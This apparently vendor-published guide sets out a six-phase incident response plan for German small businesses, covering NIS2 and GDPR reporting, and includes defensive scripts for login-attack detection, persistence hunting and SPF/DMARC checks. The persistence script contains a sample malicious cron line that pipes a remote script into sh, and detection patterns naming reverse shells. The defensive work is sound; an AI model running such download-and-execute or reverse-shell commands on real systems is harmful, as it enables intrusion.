74% of SMBs Handle Cybersecurity Themselves. That’s the Problem.
Three out of four small business owners manage their own cybersecurity. Or hand it to an untrained family member. Or just hope for the best.
Only 14% have a formal cybersecurity plan. Only 29% rate their defenses as mature. And 55% say a cyberattack costing less than EUR 50,000 would threaten their business.
Those numbers should terrify you. Germany is Europe’s number one target for cyberattacks.
NIS2 now extends cybersecurity obligations to roughly 29,000 organizations in Germany. Even if you’re not directly in scope, your clients and partners increasingly expect you to have your act together.
This guide gives you a practical incident response plan. Not a 100-page document nobody reads. A framework your actual team can execute when things go wrong.
Why SMBs Are the Target
Attackers don’t target SMBs because they’re valuable. They target them because they’re easy.
Large enterprises have SOC teams, endpoint detection, network monitoring, and dedicated incident response playbooks. SMBs have a shared admin password and antivirus software from 2022. The attack surface difference is enormous.
Ransomware gangs have shifted focus to the mid-market precisely because the payoff-to-effort ratio is better. A hospital with 200 beds will pay EUR 50,000 to get their systems back. An enterprise with a backup strategy and an incident response team won’t.
The average cost of a data breach for organizations under 500 employees was USD 3.31 million in 2024. Not pocket change. For most SMBs, that’s existential.
The Incident Response Framework
Six phases. Simple enough to remember. Detailed enough to actually work.
Phase 1: Preparation (do this now)
This is the only phase you do before an incident. Everything else happens during and after.
Identify your critical systems. What would shut down your business if it went offline? Customer database, email, accounting system, production systems, website. Rank them. This is your recovery priority list.
Define roles. Who makes decisions during an incident? Who communicates with customers? Who handles technical response? You don’t need a 10-person team. You need three people who know their role: an incident lead (usually the CEO or CTO for SMBs), a technical responder, and a communications point person.
Set up offline contacts. If your email server is compromised, how do you reach your team? Personal phone numbers, a Signal group, a secondary email domain. Write it down. Print it out. Put it somewhere accessible that isn’t your primary IT system.
Configure basic monitoring. You can’t respond to what you can’t see. At minimum: centralized logging for authentication events (successes and failures), alerts for failed-login patterns such as brute force and password spraying, and alerts for unusual data access or bulk downloads. Retain the logs for at least 90 days; intrusions are often discovered weeks after the initial access. Cloud providers and identity platforms offer these tools. Turn them on, and route the alerts to a person who will actually read them.
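What “alerts for failed login patterns” can look like in practice, as an added example that is not part of the original article: a short Python script that runs two detections over authentication logs, a brute-force burst against one account (with the follow-on check that matters most, a success from the same address right after the burst) and a password spray, where one address tries a password or two against many accounts and never trips a per-account lockout. The log format, the thresholds and the sample lines are all constructed for the example; to use it on your own exported sign-in logs, adjust parse_line() to your provider’s format.

```python
"""Flag brute-force and password-spray patterns in authentication logs.

Added example for the monitoring step above; it is not code from the
original article. The log format is a constructed, simplified one:
    <ISO-8601 timestamp> auth <success|failure> user=<name> ip=<address>
Adapt parse_line() to whatever your identity provider or servers emit.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
BRUTE_FORCE_FAILURES = 5   # failures for one (user, ip) pair inside WINDOW
SPRAY_DISTINCT_USERS = 5   # distinct users failing from one ip inside WINDOW

# Constructed sample log, not real traffic. It contains a brute-force burst
# against one account that ends in a success, a password spray (one ip, one
# failure per account, many accounts) and ordinary noise that must not alert.
SAMPLE_LOG = """\
2025-03-04T08:00:01Z auth failure user=anna ip=203.0.113.10
2025-03-04T08:00:02Z auth failure user=anna ip=203.0.113.10
2025-03-04T08:00:03Z auth failure user=anna ip=203.0.113.10
2025-03-04T08:00:04Z auth failure user=anna ip=203.0.113.10
2025-03-04T08:00:05Z auth failure user=anna ip=203.0.113.10
2025-03-04T08:00:06Z auth failure user=anna ip=203.0.113.10
2025-03-04T08:01:00Z auth success user=anna ip=203.0.113.10
2025-03-04T08:05:00Z auth failure user=anna ip=198.51.100.7
2025-03-04T08:05:01Z auth failure user=ben ip=198.51.100.7
2025-03-04T08:05:02Z auth failure user=chris ip=198.51.100.7
2025-03-04T08:05:03Z auth failure user=dana ip=198.51.100.7
2025-03-04T08:05:04Z auth failure user=erik ip=198.51.100.7
2025-03-04T08:10:00Z auth failure user=clara ip=192.0.2.44
2025-03-04T08:10:30Z auth success user=clara ip=192.0.2.44
"""


def parse_line(line):
    """Return (time, result, user, ip) for one log line, or None if malformed."""
    parts = line.split()
    if len(parts) != 5 or parts[1] != "auth":
        return None
    fields = dict(p.split("=", 1) for p in parts[3:] if "=" in p)
    if "user" not in fields or "ip" not in fields:
        return None
    ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
    return ts, parts[2], fields["user"], fields["ip"]


def has_burst(times, threshold):
    """True if at least `threshold` timestamps fall inside any span of WINDOW."""
    times = sorted(times)
    start = 0
    for end in range(len(times)):
        while times[end] - times[start] > WINDOW:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


def detect(log_text):
    """Return findings as (kind, user, ip) tuples; user is None for sprays."""
    events = sorted(e for e in map(parse_line, log_text.splitlines()) if e)
    failures = defaultdict(list)        # (user, ip) -> failure times
    first_failure = defaultdict(dict)   # ip -> {user: time of first failure}
    successes = []
    for ts, result, user, ip in events:
        if result == "failure":
            failures[(user, ip)].append(ts)
            first_failure[ip].setdefault(user, ts)
        elif result == "success":
            successes.append((ts, user, ip))

    findings = []
    for (user, ip), times in failures.items():
        if has_burst(times, BRUTE_FORCE_FAILURES):
            findings.append(("brute_force", user, ip))
            # A success from the same ip shortly after the burst is the alert
            # that matters most: the guessing probably worked.
            last = max(times)
            if any(u == user and i == ip and last <= t <= last + WINDOW
                   for t, u, i in successes):
                findings.append(("success_after_brute_force", user, ip))
    # Spray detection groups by source ip, not by account: each account sees
    # only one failure, so a per-account lockout never fires.
    for ip, users in first_failure.items():
        if has_burst(list(users.values()), SPRAY_DISTINCT_USERS):
            findings.append(("password_spray", None, ip))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(*finding)
```

The two groupings are the point: a per-account threshold alone catches the brute force but misses the spray entirely, because every account in a spray fails exactly once. Tune the thresholds against a week of your own logs before wiring the output to a pager, otherwise the first person to forget a password becomes an incident.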
Get your NIS2 ducks in a row. If you’re in scope, you’re required to send the BSI an early warning of significant incidents within 24 hours of becoming aware of them, with further reports following (see Regulatory Reporting below). Know the process. Know the portal. Don’t figure this out during a crisis. Our NIS2 compliance guide walks through the full requirements.
Phase 2: Identification
Something looks wrong. An employee reports a phishing email. Your monitoring flags unusual login activity. A client says they received a strange email from your domain. Now what?
Verify the incident. Not every alert is an incident. Check for false positives. But err on the side of treating suspicious activity seriously. Better to investigate a false alarm than to dismiss a real breach.
Classify severity. Is this a single compromised account? A ransomware infection? A data breach? Is personal data involved? That last question matters because it starts the 72-hour GDPR clock. The response scales with severity.
Document from minute one. Timestamp everything. Who noticed what, when. What systems are affected. What data is potentially exposed. This documentation becomes your evidence trail and your regulatory report.
Phase 3: Containment
Stop the bleeding. Limit the damage. Don’t fix anything yet. Just contain.
Short-term containment. Isolate affected systems from the network. Disable compromised accounts and revoke their active sessions and tokens; a password reset alone leaves the attacker’s existing session logged in. Block malicious IP addresses. If ransomware is spreading, disconnect systems before it reaches your backups.
Critical rule: do not power off affected systems. Disconnect them from the network instead (pull the cable, disable Wi-Fi, or use your EDR’s network isolation). Forensic evidence such as running processes, open network connections and, for some ransomware, the encryption keys lives in memory. Shutting down, gracefully or not, destroys it. If you want a memory image, capture it while the machine is still running.
Long-term containment. If the incident requires extended response, set up a clean environment to continue business operations while the investigation continues. Redirect critical services to backup systems.
Phase 4: Eradication
Find the root cause. Remove it completely.
If the entry point was a phishing email, identify every system the attacker accessed from that initial foothold. If it was an unpatched vulnerability, patch it across every affected system. If it was a compromised credential, reset every credential that the compromised account had access to, including API keys, tokens and service-account secrets the attacker could have read, not just passwords.
Don’t just fix the symptom. Kill the root cause. Attackers who find one way in usually set up others. Check for persistence mechanisms: scheduled tasks and cron jobs, modified startup scripts and services, backdoor accounts and added SSH keys, and in cloud tenants rogue OAuth app grants and mailbox forwarding rules.
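A concrete way to run the persistence check on a Linux host, added here as an example (not from the original article): compare the live account list and cron jobs against the known-good snapshot you took in Phase 1, and pattern-match the cron lines for the download-and-run and hidden-binary tricks that appear in most commodity intrusions. The /etc/passwd and crontab contents below are constructed, and the baseline snapshot itself is an assumption of the example. The same diff-against-baseline idea applies to authorized_keys files and systemd units, and on Windows to scheduled tasks and Run keys, which this script does not cover.

```python
"""Diff a live host's accounts and cron jobs against a known-good baseline.

Added example for the persistence check above; not code from the original
article, and Linux-specific. The inputs are the text of /etc/passwd and the
combined crontab output; the samples below are constructed. The baseline is
the snapshot you take in Phase 1, while the system is still trusted.
"""
import re

# Constructed known-good snapshot taken before the incident.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
anna:x:1000:1000:Anna:/home/anna:/bin/bash
"""

# Constructed current state: a second UID-0 account, a new user, and a
# service account whose shell was switched from nologin to bash.
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
anna:x:1000:1000:Anna:/home/anna:/bin/bash
sysadm:x:0:0::/root:/bin/bash
support:x:1001:1001::/home/support:/bin/bash
"""

# Constructed crontab content (what `crontab -l` and /etc/cron.d/* would give).
CURRENT_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.23/u.sh | sh
@reboot /dev/shm/.x/agent
30 3 * * 0 /usr/bin/certbot renew --quiet
"""

SUSPICIOUS_CRON = (
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),   # download and execute
    re.compile(r"\bbase64\s+(-d|--decode)\b"),       # encoded payload
    re.compile(r"/(tmp|var/tmp|dev/shm)/\S+"),       # runs from world-writable dirs
    re.compile(r"\b(nc|ncat|bash -i)\b.*/dev/tcp/"),  # reverse shell
)


def parse_passwd(text):
    """Return {username: (uid, shell)} from /etc/passwd-format text."""
    accounts = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2].isdigit():
            accounts[fields[0]] = (int(fields[2]), fields[6])
    return accounts


def find_uid0_aliases(passwd_text):
    """Accounts other than root with UID 0: full root access under another name."""
    return sorted(name for name, (uid, _) in parse_passwd(passwd_text).items()
                  if uid == 0 and name != "root")


def diff_accounts(passwd_text, baseline_text):
    """Return (added, changed): names missing from the baseline, and names whose
    uid or login shell differs from the baseline."""
    now, base = parse_passwd(passwd_text), parse_passwd(baseline_text)
    added = sorted(set(now) - set(base))
    changed = sorted(n for n in now if n in base and now[n] != base[n])
    return added, changed


def find_suspicious_cron(cron_text):
    """Return cron lines matching common download-and-run or hidden-binary patterns."""
    hits = []
    for line in cron_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and any(p.search(line) for p in SUSPICIOUS_CRON):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("uid 0 aliases:", find_uid0_aliases(CURRENT_PASSWD))
    print("added, changed:", diff_accounts(CURRENT_PASSWD, BASELINE_PASSWD))
    for hit in find_suspicious_cron(CURRENT_CRONTAB):
        print("cron:", hit)
```

The pattern list will not catch a careful attacker, which is why the baseline diff comes first: anything that is present now and was not in the snapshot needs an explanation, regardless of how innocent it looks. Without a baseline you are left guessing which of your own service accounts were always there.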
Phase 5: Recovery
Bring systems back. Carefully.
Restore from known-good backups taken before the attacker’s earliest confirmed activity; a backup that already contains the backdoor reinfects you on day one. Verify integrity before reconnecting to the network. Monitor restored systems intensively for the first 48-72 hours. Attackers sometimes leave dormant payloads that activate after recovery.
Prioritize recovery based on your critical systems list from Phase 1. Customer-facing systems first. Internal tools second. Nice-to-haves last.
Phase 6: Lessons learned
Within one week of resolution, hold a blameless post-mortem. What happened? When did you detect it? How long did containment take? What worked? What didn’t?
Turn findings into concrete improvements. If detection took too long, invest in better monitoring.
If containment was chaotic, run a tabletop exercise next quarter. If the root cause was an unpatched system, fix your patch management process.
Document the post-mortem. Share it with the team. This is how you get better.
Regulatory Reporting
Under NIS2 (if you’re in scope), the timeline is rigid:
- Within 24 hours of becoming aware: early warning to the BSI. What happened, whether you suspect malicious action, and whether there could be cross-border impact.
- Within 72 hours of becoming aware: incident notification. Initial assessment of severity and impact, indicators of compromise, mitigation measures taken so far.
- Within one month of the incident notification: final report. Root cause or threat type, full impact assessment, mitigation measures applied and still ongoing.
Under GDPR (if personal data is affected):
- Within 72 hours of becoming aware of the breach: notify your supervisory authority, unless the breach is unlikely to result in a risk to the affected individuals. In Germany, that’s typically the data protection authority of your federal state (Landesdatenschutzbehörde).
- Without undue delay: Notify affected individuals if the breach poses a high risk to their rights and freedoms.
Having the documentation from Phase 2 onward makes these reports dramatically easier to compile. That’s why you document from minute one.
The Minimum Security Stack for SMBs
You don’t need enterprise-grade tools. You need the basics, done right.
Multi-factor authentication on everything. Email, cloud services, admin panels, VPN. Non-negotiable. Prefer phishing-resistant methods (FIDO2 security keys or passkeys) for admin accounts; SMS codes are the weakest option, and push prompts can be worn down by an attacker who keeps sending them.
Automated patching for operating systems and critical software. If you can’t patch within 30 days, you’re already behind.
Email security with anti-phishing and anti-spoofing (SPF, DKIM and DMARC, with the DMARC policy set to quarantine or reject; p=none only reports and blocks nothing). Phishing is the number one attack vector for SMBs. Block what you can automatically.
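To see what “done right” means for SPF and DMARC, here is an added example (not from the original article) that checks record text for the settings spoofers rely on: an SPF record ending in +all or ?all, which lets any host send as your domain; the deprecated ptr mechanism; more than ten DNS-lookup mechanisms, after which receivers fail the check outright; and a DMARC policy of p=none, which only monitors. The records are constructed; the script evaluates the TXT text you pass it (for instance the output of dig TXT example.com and dig TXT _dmarc.example.com) and does not resolve include: targets, so treat its lookup count as a lower bound.

```python
"""Check SPF and DMARC records for the weak settings that let spoofed mail through.

Added example for the email-security item above; not code from the original
article. It evaluates record text only and does not follow include: or
redirect= targets, so the DNS-lookup count is a lower bound on what a
receiving mail server will compute.
"""

SPF_LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def check_spf(record):
    """Return finding codes for one SPF TXT record (empty list = no issue found)."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["spf:not_an_spf_record"]
    findings, lookups, all_qualifier = [], 0, None
    for term in terms[1:]:
        qualifier = "+"                      # RFC 7208: no qualifier means pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mechanism = term.split(":", 1)[0].split("/", 1)[0].split("=", 1)[0].lower()
        if mechanism in SPF_LOOKUP_MECHANISMS:
            lookups += 1
        if mechanism == "ptr":
            findings.append("spf:ptr_deprecated")
        if mechanism == "all":
            all_qualifier = qualifier
    if lookups > 10:                         # receivers return permerror above 10
        findings.append("spf:too_many_dns_lookups")
    if all_qualifier is None:
        findings.append("spf:no_all_mechanism")      # implicit neutral, like ?all
    elif all_qualifier == "+":
        findings.append("spf:all_permits_everyone")  # any host may send as you
    elif all_qualifier == "?":
        findings.append("spf:all_neutral")
    elif all_qualifier == "~":
        findings.append("spf:all_softfail")          # fine with DMARC; -all is stricter
    return findings


def check_dmarc(record):
    """Return finding codes for one DMARC TXT record (empty list = enforcing)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        return ["dmarc:not_a_dmarc_record"]
    findings = []
    policy = tags.get("p", "").lower()
    if policy not in ("none", "quarantine", "reject"):
        findings.append("dmarc:missing_or_invalid_policy")
    elif policy == "none":
        findings.append("dmarc:policy_none")         # monitoring only, nothing is blocked
    if tags.get("sp", "").lower() == "none" and policy != "none":
        findings.append("dmarc:subdomain_policy_none")  # subdomains stay spoofable
    if "rua" not in tags:
        findings.append("dmarc:no_aggregate_reports")   # you never learn who spoofs you
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = -1
    if not 0 <= pct <= 100:
        findings.append("dmarc:invalid_pct")
    elif pct < 100:
        findings.append("dmarc:partial_enforcement")  # policy applied to a sample only
    return findings


# Constructed records for a domain with the basics wrong, and the fixed versions.
WEAK_SPF = "v=spf1 a mx include:_spf.mailer.example ptr +all"
WEAK_DMARC = "v=DMARC1; p=none"
FIXED_SPF = "v=spf1 include:_spf.mailer.example -all"
FIXED_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; fo=1"

if __name__ == "__main__":
    for label, spf, dmarc in (("weak", WEAK_SPF, WEAK_DMARC), ("fixed", FIXED_SPF, FIXED_DMARC)):
        print(label, check_spf(spf) + check_dmarc(dmarc))
```

Two caveats when you run this against your own domain. Moving from p=none to p=reject without first reading the aggregate reports (rua) for a few weeks will block legitimate mail from the SaaS tools you forgot send on your behalf, so add the rua address first and tighten the policy second. And DKIM is checked at the selector record, not the domain apex; this script leaves it out because the weak settings there (a revoked or empty public key, or a short RSA key) need a DNS lookup per selector to find.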
Encrypted backups, with one copy offline or immutable. The 3-2-1 rule: three copies, two different media types, one offsite. Ransomware that can reach your backups will encrypt or delete them, so at least one copy must be unreachable from the production network. Check that backup jobs complete every month and test a full restore at least quarterly; a backup you have never restored from is a hope, not a plan.
Endpoint protection on every device. Modern EDR (Endpoint Detection and Response) is better than traditional antivirus. CrowdStrike Falcon Go, SentinelOne, and Microsoft Defender for Business are all viable for SMBs.
For the broader compliance context, see our pillar guide on EU compliance for software teams. And if you’re building software that needs to survive audits, our Security by Design guide covers the development side.
Need help building a cybersecurity foundation for your business? Let’s assess your current posture. We’ll identify the gaps and build a practical security roadmap that fits your team and budget.